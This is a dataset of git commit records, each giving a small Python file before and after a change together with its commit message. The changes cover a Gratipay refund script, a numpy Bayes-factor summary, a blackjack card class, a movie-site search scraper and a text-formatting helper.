out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
| #!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.billing.payday import threaded_map
import csv, os, requests
import threading
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
writelock = threading.Lock()
def refund(row):
ts, id, amount, username, route_id = row
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
writelock.acquire()
try:
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
finally:
writelock.release()
return
threaded_map(refund, inp)
| Use threaded_map to speed up refunds | Use threaded_map to speed up refunds
| Python | mit | gratipay/gratipay.com,gratipay/gratipay.com,gratipay/gratipay.com,gratipay/gratipay.com | #!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
import csv, os, requests
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
for ts, id, amount, username, route_id in inp:
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
Use threaded_map to speed up refunds | #!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.billing.payday import threaded_map
import csv, os, requests
import threading
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
writelock = threading.Lock()
def refund(row):
ts, id, amount, username, route_id = row
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
writelock.acquire()
try:
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
finally:
writelock.release()
return
threaded_map(refund, inp)
| <commit_before>#!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
import csv, os, requests
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
for ts, id, amount, username, route_id in inp:
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
<commit_msg>Use threaded_map to speed up refunds<commit_after> | #!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.billing.payday import threaded_map
import csv, os, requests
import threading
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
writelock = threading.Lock()
def refund(row):
ts, id, amount, username, route_id = row
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
writelock.acquire()
try:
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
finally:
writelock.release()
return
threaded_map(refund, inp)
| #!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
import csv, os, requests
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
for ts, id, amount, username, route_id in inp:
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
Use threaded_map to speed up refunds#!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.billing.payday import threaded_map
import csv, os, requests
import threading
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
writelock = threading.Lock()
def refund(row):
ts, id, amount, username, route_id = row
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
writelock.acquire()
try:
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
finally:
writelock.release()
return
threaded_map(refund, inp)
| <commit_before>#!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
import csv, os, requests
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
for ts, id, amount, username, route_id in inp:
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
<commit_msg>Use threaded_map to speed up refunds<commit_after>#!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.billing.payday import threaded_map
import csv, os, requests
import threading
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
writelock = threading.Lock()
def refund(row):
ts, id, amount, username, route_id = row
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
writelock.acquire()
try:
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
finally:
writelock.release()
return
threaded_map(refund, inp)
|
0cb87e52f91c85ec99b58f2795c7762354531e7c | python/assemble_BFs.py | python/assemble_BFs.py | import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.argmax(BFs)
min_idx = np.argmin(BFs)
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
| import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.unravel_index(np.argmax(BFs), (30,7))
min_idx = np.unravel_index(np.argmin(BFs), (30,7))
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
| Unravel index for argmin of array | Unravel index for argmin of array
| Python | bsd-3-clause | mirams/PyHillFit,mirams/PyHillFit,mirams/PyHillFit | import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.argmax(BFs)
min_idx = np.argmin(BFs)
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
Unravel index for argmin of array | import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.unravel_index(np.argmax(BFs), (30,7))
min_idx = np.unravel_index(np.argmin(BFs), (30,7))
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
| <commit_before>import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.argmax(BFs)
min_idx = np.argmin(BFs)
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
<commit_msg>Unravel index for argmin of array<commit_after> | import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.unravel_index(np.argmax(BFs), (30,7))
min_idx = np.unravel_index(np.argmin(BFs), (30,7))
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
| import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.argmax(BFs)
min_idx = np.argmin(BFs)
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
Unravel index for argmin of arrayimport doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.unravel_index(np.argmax(BFs), (30,7))
min_idx = np.unravel_index(np.argmin(BFs), (30,7))
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
| <commit_before>import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.argmax(BFs)
min_idx = np.argmin(BFs)
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
<commit_msg>Unravel index for argmin of array<commit_after>import doseresponse as dr
import numpy as np
import itertools as it
import os
import argparse
import sys
parser = argparse.ArgumentParser()
requiredNamed = parser.add_argument_group('required arguments')
requiredNamed.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv", required=True)
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
dr.setup(args.data_file)
drugs_channels_idx = it.product(range(30), range(7))
BFs = np.zeros((30, 7))
for i, j in drugs_channels_idx:
top_drug = dr.drugs[i]
top_channel = dr.channels[j]
drug, channel, chain_file, images_dir = dr.nonhierarchical_chain_file_and_figs_dir(1, top_drug, top_channel, 1)
bf_dir = "BFs/"
bf_file = bf_dir + "{}_{}_B12.txt".format(drug,channel)
BFs[i, j] = np.loadtxt(bf_file)
max_idx = np.unravel_index(np.argmax(BFs), (30,7))
min_idx = np.unravel_index(np.argmin(BFs), (30,7))
print "max:", BFs[max_idx]
print "min:", BFs[min_idx]
|
dbf0fb82263005d90a84ff9011da9849d0a3d0f3 | cards/bjcard.py | cards/bjcard.py | """
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.info(f"My {self} is worth {self._value} points")
return self._value
| """
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.debug(f"My {self} is worth {self._value} points")
return self._value
| Change log message to debug | Change log message to debug
| Python | mit | johnpapa2/twenty-one,johnpapa2/twenty-one | """
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.info(f"My {self} is worth {self._value} points")
return self._value
Change log message to debug | """
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.debug(f"My {self} is worth {self._value} points")
return self._value
| <commit_before>"""
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.info(f"My {self} is worth {self._value} points")
return self._value
<commit_msg>Change log message to debug<commit_after> | """
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.debug(f"My {self} is worth {self._value} points")
return self._value
| """
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.info(f"My {self} is worth {self._value} points")
return self._value
Change log message to debug"""
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.debug(f"My {self} is worth {self._value} points")
return self._value
| <commit_before>"""
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.info(f"My {self} is worth {self._value} points")
return self._value
<commit_msg>Change log message to debug<commit_after>"""
Created on Dec 24, 2016
@author: john papa
Copyright 2016 John Papa. All rights reserved.
This work is licensed under the MIT License.
"""
import logging
from .card import Card
class BjCard(Card):
def __init__(self, suit, rank):
super().__init__(suit, rank)
self._logger = logging.getLogger('bj')
@property
def value(self):
""" Returns the value of the card used for scoring the game """
if self._value:
return self._value
elif self.rank not in list('JQKA'):
self._value = int(self.rank)
elif self.rank in list('JQK'):
self._value = 10
else:
self._value = 11
self._logger.debug(f"My {self} is worth {self._value} points")
return self._value
|
70808dfd53c5a5760a13252a72caf229793e8225 | crawl.py | crawl.py | import urllib2;
from bs4 import BeautifulSoup;
| import urllib.parse;
import urllib.request;
from bs4 import BeautifulSoup;
def searchLink(search):
BASE_URL = "http://www.990.ro/"
key = urllib.parse.urlencode({'kw': search}).encode('ascii');
re = urllib.request.Request(BASE_URL + 'functions/search3/live_search_using_jquery_ajax/search.php', key);
re_link = urllib.request.urlopen(re);
soup = BeautifulSoup(re_link.read(), "lxml");
ref = soup.find_all('a');
names = soup.find_all('div', id="rest");
if(ref != []):
print("Search returned:")
i = 1;
for name in names:
print(str(i) + ". " + name.get_text());
i+=1;
select = int(input("\nPlease select the corresponding number: "));
return BASE_URL + ref[select - 1].get('href');
else:
print("Nothing found!");
return '';
movie = input("search: ");
print(searchLink(movie));
| Add search method to find the movies/series home url | Add search method to find the movies/series home url
| Python | mit | raztechs/py-video-crawler | import urllib2;
from bs4 import BeautifulSoup;
Add search method to find the movies/series home url | import urllib.parse;
import urllib.request;
from bs4 import BeautifulSoup;
def searchLink(search):
BASE_URL = "http://www.990.ro/"
key = urllib.parse.urlencode({'kw': search}).encode('ascii');
re = urllib.request.Request(BASE_URL + 'functions/search3/live_search_using_jquery_ajax/search.php', key);
re_link = urllib.request.urlopen(re);
soup = BeautifulSoup(re_link.read(), "lxml");
ref = soup.find_all('a');
names = soup.find_all('div', id="rest");
if(ref != []):
print("Search returned:")
i = 1;
for name in names:
print(str(i) + ". " + name.get_text());
i+=1;
select = int(input("\nPlease select the corresponding number: "));
return BASE_URL + ref[select - 1].get('href');
else:
print("Nothing found!");
return '';
movie = input("search: ");
print(searchLink(movie));
| <commit_before>import urllib2;
from bs4 import BeautifulSoup;
<commit_msg>Add search method to find the movies/series home url<commit_after> | import urllib.parse;
import urllib.request;
from bs4 import BeautifulSoup;
def searchLink(search):
BASE_URL = "http://www.990.ro/"
key = urllib.parse.urlencode({'kw': search}).encode('ascii');
re = urllib.request.Request(BASE_URL + 'functions/search3/live_search_using_jquery_ajax/search.php', key);
re_link = urllib.request.urlopen(re);
soup = BeautifulSoup(re_link.read(), "lxml");
ref = soup.find_all('a');
names = soup.find_all('div', id="rest");
if(ref != []):
print("Search returned:")
i = 1;
for name in names:
print(str(i) + ". " + name.get_text());
i+=1;
select = int(input("\nPlease select the corresponding number: "));
return BASE_URL + ref[select - 1].get('href');
else:
print("Nothing found!");
return '';
movie = input("search: ");
print(searchLink(movie));
| import urllib2;
from bs4 import BeautifulSoup;
Add search method to find the movies/series home urlimport urllib.parse;
import urllib.request;
from bs4 import BeautifulSoup;
def searchLink(search):
BASE_URL = "http://www.990.ro/"
key = urllib.parse.urlencode({'kw': search}).encode('ascii');
re = urllib.request.Request(BASE_URL + 'functions/search3/live_search_using_jquery_ajax/search.php', key);
re_link = urllib.request.urlopen(re);
soup = BeautifulSoup(re_link.read(), "lxml");
ref = soup.find_all('a');
names = soup.find_all('div', id="rest");
if(ref != []):
print("Search returned:")
i = 1;
for name in names:
print(str(i) + ". " + name.get_text());
i+=1;
select = int(input("\nPlease select the corresponding number: "));
return BASE_URL + ref[select - 1].get('href');
else:
print("Nothing found!");
return '';
movie = input("search: ");
print(searchLink(movie));
| <commit_before>import urllib2;
from bs4 import BeautifulSoup;
<commit_msg>Add search method to find the movies/series home url<commit_after>import urllib.parse;
import urllib.request;
from bs4 import BeautifulSoup;
def searchLink(search):
BASE_URL = "http://www.990.ro/"
key = urllib.parse.urlencode({'kw': search}).encode('ascii');
re = urllib.request.Request(BASE_URL + 'functions/search3/live_search_using_jquery_ajax/search.php', key);
re_link = urllib.request.urlopen(re);
soup = BeautifulSoup(re_link.read(), "lxml");
ref = soup.find_all('a');
names = soup.find_all('div', id="rest");
if(ref != []):
print("Search returned:")
i = 1;
for name in names:
print(str(i) + ". " + name.get_text());
i+=1;
select = int(input("\nPlease select the corresponding number: "));
return BASE_URL + ref[select - 1].get('href');
else:
print("Nothing found!");
return '';
movie = input("search: ");
print(searchLink(movie));
|
e03bc2013adb21154a1fc2b4737d92f649325154 | utils.py | utils.py | import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
template = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return template
| import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
response = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return response
| Create a new string, instead of modifying the `template` | Create a new string, instead of modifying the `template`
| Python | mit | avinassh/Laozi,avinassh/Laozi | import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
template = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return template
Create a new string, instead of modifying the `template` | import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
response = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return response
| <commit_before>import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
template = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return template
<commit_msg>Create a new string, instead of modifying the `template`<commit_after> | import re
import textwrap
import html2text
text_maker = html2text.HTML2Text()
text_maker.body_width = 0
def strip_html_tags(text):
text = re.sub(r'<a.*?</a>', '', text)
return re.sub('<[^<]+?>', '', text)
def html_to_md(string, strip_html=True, markdown=False):
if not string:
return 'No Description Found'
if strip_html:
string = strip_html_tags(string)
if markdown:
string = text_maker.handle(string)
return string
def get_formatted_book_data(book_data):
template = textwrap.dedent("""\
*Title:* {0} by {1}
*Rating:* {2} by {3} users
*Description:* {4}
*Link*: [click me]({5})
Tip: {6}""")
title = book_data['title']
authors = book_data['authors']
average_rating = book_data['average_rating']
ratings_count = book_data['ratings_count']
description = html_to_md(book_data.get('description', ''))
url = book_data['url']
tip = 'Use author name also for better search results'
response = template.format(title, authors, average_rating, ratings_count,
description, url, tip)
return response
| import re
import textwrap
import html2text
